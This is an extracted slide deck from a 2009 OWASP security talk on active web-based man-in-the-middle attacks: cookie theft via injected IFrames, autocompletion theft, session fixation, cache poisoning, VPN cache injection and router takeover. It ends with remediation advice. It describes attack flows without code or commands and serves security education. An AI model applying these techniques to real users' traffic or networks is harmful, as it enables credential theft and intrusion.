IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 1 Active Man in the Middle Attacks The OWASP Foundation OWASP 27/02/2009 Adi Sharabani Security Research Group Manager IBM Rational Application Security (a.k.a. Watchfire) adish

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 2 Agenda  Background –Man in the Middle –Network level – heavily researched –Web application level – sporadic research  Outline –Passive MitM attacks –Active MitM attacks –Penetrating an internal network –Remediation

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 3 Man in the Middle Scenario  All laptop users connect to a public network  Wireless connection can easily be compromised or impersonated  Wired connections might also be compromised Internet Internet

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 4 Rules of Thumb – Don’ts …  Someone might be listening to the requests –Don’t browse sensitive sites –Don’t supply sensitive information  Someone might be altering the responses –Don’t trust any information given on web sites –Don’t execute downloaded code

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 5 Rules of Thumb – What Can You Do?  This leaves us with: –Browse your favorite news site –Browse your favorite weather site Internet Internet Non-sensitive sites Boring Non-sensitive sites Boring Sensitive sites Interesting Sensitive sites Interesting

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 6 You are still vulnerable

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 7 Mitigating a Fallacy  Fallacy –Executing JavaScript on victim == executing an attack  Reality –Same origin policy –Executing an attack –JavaScript + browser implementation bug –JavaScript + execution on a specific domain –Can be done through XSS

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 8 Passive Man in the Middle Attacks Victim browses to a website Attacker views the request manipulates it and forwards to server Attacker views the response manipulates it and forwards to victim Server returns a response Other servers are not affected

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 9 Active Man in the Middle Attack  The attacker actively directs the victim to an “interesting” site  The IFrame could be invisible Victim browses to a “boring” site Attack transfers the request to the server Attacker adds an IFRAME referencing an “interesting” site Server returns a response My Weather Channel My Bank Site Automatic request sent to the interesting server My Bank Site Other servers are not affected

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 10

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 11 Stealing Cookies* Automatic request contains victim’s cookies  Obvious result  Stealing cookies associated with any domain attacker desires  Will also work for HTTP ONLY cookies (as opposed to XSS attacks) * A similar attack was presented by Mike Perry – SideJacking

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 12 Demo

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 13 Overcoming Same Origin Policy Attacker adds a malicious script to the response Attacker adds a malicious script to the response Attacker forwards the automatic request to the “interesting” server Script executes with the “interesting” server’s restrictions “Interesting” server returns a response Attacker injects an IFRAME directing to an “interesting” site Victim surfs to a “boring” site Automatic request sent to the interesting server  Result –Attacker can execute scripts on any domain she desires –Scripts can fully interact with any “interesting” website  Limitations –Will only work for non SSL web sites

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 14 Secure Connections Login Mechanism

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 15 Secure Connections Please Login Username Password SUBMIT jsmith ******** SUBMIT Victim browses to site Victim browses to site Site returns a response with login form Victim fills login details, and submits the form Login request is sent through a secure channel Login Successful Hello John Smith,  Pre-login action sent in clear text  Attacker could alter the pre-login response to make the login request sent unencrypted

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 16 Stealing Auto Completion Information Script accesses the auto-completion information using the DOM Attacker redirect victim to a request to a pre-login page Attacker returns the original login form together with a malicious script * A passive version of this attack was described by RSnake in his blog  Result –Attacker can steal any auto-completion information she desires  Limitations –Will only work for pre-login pages not encrypted –Will not work seamlessly in IE

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 17 Demo

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 18 Broadening the Attack (Time Dimension)

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 19 Passive MitM Attacks Active MitM Attacks Present (“boring” sites) Present (“boring” sites) Past (“interesting” sites) Past (“interesting” sites) Future (“interesting” sites) Future (“interesting” sites)

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 20 Session Fixation Cookie is being saved on victim’s computer Attacker redirects victim to the site of interest Attacker returns a page with a cookie generated by server A while later, victim connects to the site (with the pre-provided cookie) A while later, victim connects to the site (with the pre-provided cookie) Attacker uses the same cookie to connect to the server Server authenticates attacker as victim  Result –Attacker can set persistent cookies on victim  Limitations –The vulnerability also lies within the server

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 21 Cache Poisoning Page is being cached on victim’s computer Attacker redirects victim to the site of interest Attacker returns a malicious page with cache setting enabled A while later, victim visits the site A while later, victim visits the site  Result –Attacker can poison any page she desires –Poisoned pages will be persistent  Limitations –Attacker can poison non SSL resources

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 22 Demo

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 23 Complex Hacking Virtual Private Networks

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 24 Virtual Private Networks (VPN)  VPN client initialization –Create a secure network interface –Set user’s routing table  VPN client finalization (upon exit or when connection is lost) –Revert routing table Do not confuse VPN and HTTPS architectures!

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 25 VPN Mixed content Internal Web Site...  Result  VPN web sites are compromised  User is not alerted to the security risk  As opposed to SSL mixed content issues  Limitations  Such mixed content is not widely used Malicious script executes within the secure environment Attacker alters the non- encrypted script Victim surfs to a page in the VPN network

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 26 Hacking Non-Available Sites  Result  Attacker can view and change any HTTP cache object  Even for non available sites

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 27 VPN Cache Injection Attacker disconnects connection to VPN Server After routing table is updated, Attacker poisons the cache of an internal site Attacker recovers connection Cached resource loads and malicious cached script executes Attacker redirects victim to cached resource  Result  VPN is great for the network level  VPN is not enough for the application level  This attack could be applied to other application protocols!

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 28 Complex Hacking Intranet Networks

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 29 Penetrating Internal Network – Simple Cache Poison  Result  Attack will be launched every time victim accesses the resource  The attack would executed within the local intranet  Characteristics  Firewall protections are helpless  Affected servers will never know  The attack is persistent

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 30 Setting Up a Future MitM Scenario  Result  Facilitates future MitM scenarios  Does not require router’s credentials  Fake settings could be displayed to the user  Limitations  Requires victim to access router in the future  Need to guess router’s address ( ) Using Active MitM Techniques, attacker poisons victim’s cache related to his router’s web access Using Active MitM Techniques, attacker poisons victim’s cache related to his router’s web access Router Victim’s router related cache poisoned with a malicious script Script hides the configuration changes Malicious script executed when victim tries to access router Script configures router to tunnel future communication through attacker Outbound Proxy IP Address Primary DNS Server Address

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 31 Increasing the Exposure  Poison common home pages –Script will execute every time victim opens his browser  Poison common scripts –Script will execute on every page using the common script –Example:  The “double active” attack –Common poisoned page redirects to another poisoned resource.JS

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 32 The Double Active Cache Poisoning Attack Using Active MitM techniques, attacker poisons common router’s address (i.e ) Using Active MitM techniques, attacker poisons common router’s address (i.e ) At a later time, Victim opens browser At a later time, Victim opens browser Cached home page is loaded and redirects victim’s browser to router’s web interface Cached router’s web interface is loaded and malicious script changes router’s settings  Result  Internal network has been compromised  Limitation  Need to guess router IP and credentials Attacker also poisons common home pages Router Router is compromised by malicious script

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 33 Active Attack Characteristics –Not noticeable in user’s experience –Not noticeable by any of the web sites –IPS/IDS will not block it –Can be persistent –Can be used to hack into local organization –Bypasses any firewall or VPN –Can be used with DNS Pinning Techniques –A problem with the current design –Requires only one plain HTTP request to be transmitted

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 34 Remediation  Users –Do not use auto-completion –“Clean Slate Policy” –Trust level separation –Two different browsers –Two different users –Two different OS –Virtualization products –Tunnel communication through a secure proxy –Might not be allowed in many hot-spots

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 35  Web owners –Consider risks of partial SSL sites –Do not consider secure VPN connection as an SSL replacement –Use random tokens for common scripts –While considering performance issues –Avoid referring external scripts from internal sites

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 36  Industry –Build integrity mechanism for HTTP –Secure WiFi networks

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 37 Summary  Active MitM attacks– broaden the scope of the passive attacks –Design issues –Dimension of time –Past (steal cookies, auto-completion information, cache) –Future (set up cookies, poison cache, poison form filler) –Penetrating internal networks –Persistent –Bypass any current protection mechanisms  More information: –Paper and presentation will be uploaded to our blog:

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 38 References  Watchfire’s Blog:   Wireless Man in the Middle Attacks: –  SideJacking: –  More on SideJacking: –  Active SideJacking: –  Surf Jacking –  Stealing User Information: –

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 39 Thank you!